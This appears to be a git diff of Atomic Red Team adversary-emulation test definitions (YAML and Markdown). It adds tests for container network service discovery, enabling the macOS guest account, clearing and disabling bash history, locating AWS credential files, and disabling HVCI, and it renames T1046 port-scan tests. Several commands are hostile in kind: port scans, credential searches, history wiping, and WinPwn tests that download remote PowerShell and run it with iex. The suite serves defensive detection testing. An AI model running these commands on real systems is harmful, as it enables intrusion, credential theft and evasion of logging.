docker rmi -f t1069
|
||||
name: sh
|
||||
T1201:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -91877,7 +92165,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -92079,6 +92367,43 @@ discovery:
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
T1518:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -104873,6 +105198,17 @@ initial-access:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1193:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -9568,6 +9568,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -10437,6 +10438,115 @@ defense-evasion:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: "An attacker may clear the bash history cache and the history file
|
||||
as their last act before logging off to remove the record of their command
|
||||
line activities. \n\nIn this test we use the $HISTFILE variable throughout
|
||||
to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
|
||||
the file is empty 6 clear the history cache 7. confirm the history cache is
|
||||
empty. This is when the attacker would logoff.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
|
||||
fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
|
||||
is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
|
||||
[ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
|
||||
cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: "An attacker may exploit the space before a command (e.g. \" ls\")
|
||||
or the duplicate command suppression feature in Bash history to prevent their
|
||||
commands from being recorded in the history file or to obscure the order of
|
||||
commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
|
||||
the history cache 3. executes ls -la with a space in-front of it 4. confirms
|
||||
that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
|
||||
6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
|
||||
that their is only one command in history\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
|
||||
]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
|
||||
# \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
|
||||
-la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
|
||||
[ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
|
||||
fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
|
||||
[ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
|
||||
-la $HISTFILE\"; fi\n"
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: "An Adversary may take advantage of the HISTIGNORE environment
|
||||
variable either to ignore particular commands or all commands. \n\nIn this
|
||||
test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
|
||||
history cache 3..4 execute ls commands 5. confirm that the ls commands are
|
||||
not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
|
||||
ignoring ALL commands.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
|
||||
~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
|
||||
are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
|
||||
((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
|
||||
HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
|
||||
= *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
|
||||
\"History cache is empty\"; fi\n# -> History cache is empty\n"
|
||||
cleanup_command: 'unset HISTIGNORE
|
||||
|
||||
'
|
||||
T1497.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -54281,6 +54391,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract passwords with grep
|
||||
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
|
||||
description: 'Extracting credentials from files
|
||||
@@ -60174,7 +60303,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -6531,7 +6531,18 @@ defense-evasion:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1183:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -8920,6 +8931,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -20608,7 +20620,18 @@ privilege-escalation:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -35793,7 +35816,18 @@ persistence:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -51998,6 +52032,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
|
||||
@@ -57470,7 +57523,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -67632,7 +67685,18 @@ initial-access:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1193:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52614,7 +52615,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52481,7 +52482,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -13083,6 +13083,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -16388,6 +16389,52 @@ defense-evasion:
|
||||
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
|
||||
setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
|
||||
\"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
|
||||
HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
|
||||
Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'HVCI must be enabled
|
||||
|
||||
'
|
||||
prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
|
||||
}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" /t REG_DWORD /d 0 /f
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -79082,7 +79129,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
+59
-1
@@ -1,4 +1,4 @@
|
||||
# T1046 - Network Service Scanning
|
||||
# T1046 - Network Service Discovery
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
|
||||
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
||||
|
||||
@@ -24,6 +24,8 @@ Within macOS environments, adversaries may use the native Bonjour application to
|
||||
|
||||
- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
|
||||
|
||||
- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -341,4 +343,60 @@ fruit -noninteractive -consoleoutput
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - Network Service Discovery for Containers
|
||||
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
+195
-168
@@ -1,168 +1,195 @@
|
||||
attack_technique: T1046
|
||||
display_name: Network Service Scanning
|
||||
atomic_tests:
|
||||
- name: Port Scan
|
||||
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
|
||||
description: |
|
||||
Scan ports to check for listening ports.
|
||||
|
||||
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
executor:
|
||||
command: |
|
||||
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
|
||||
name: bash
|
||||
- name: Port Scan Nmap
|
||||
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: "80"
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if nmap command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
|
||||
- description: |
|
||||
Check if nc command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
|
||||
- description: |
|
||||
Check if telnet command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
|
||||
executor:
|
||||
command: |
|
||||
sudo nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan NMap for Windows
|
||||
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
|
||||
description: Scan ports to check for listening ports for the local host 127.0.0.1
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
nmap_url:
|
||||
description: NMap installer download URL
|
||||
type: url
|
||||
default: https://nmap.org/dist/nmap-7.80-setup.exe
|
||||
host_to_scan:
|
||||
description: The host to scan with NMap
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
NMap must be installed
|
||||
prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
|
||||
Start-Process $env:temp\nmap-7.80-setup.exe /S
|
||||
executor:
|
||||
command: |-
|
||||
nmap #{host_to_scan}
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Port Scan using python
|
||||
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
|
||||
description: |
|
||||
Scan ports to check for listening ports with python
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
host_ip:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
filename:
|
||||
description: Location of the project file
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1046\src\T1046.py
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if python exists on the machine
|
||||
prereq_command: |
|
||||
if (python --version) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
echo "Python 3 must be installed manually"
|
||||
executor:
|
||||
command: |
|
||||
python #{filename} -i #{host_ip}
|
||||
name: powershell
|
||||
- name: WinPwn - spoolvulnscan
|
||||
auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
|
||||
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
spoolvulnscan -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - MS17-10
|
||||
auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
|
||||
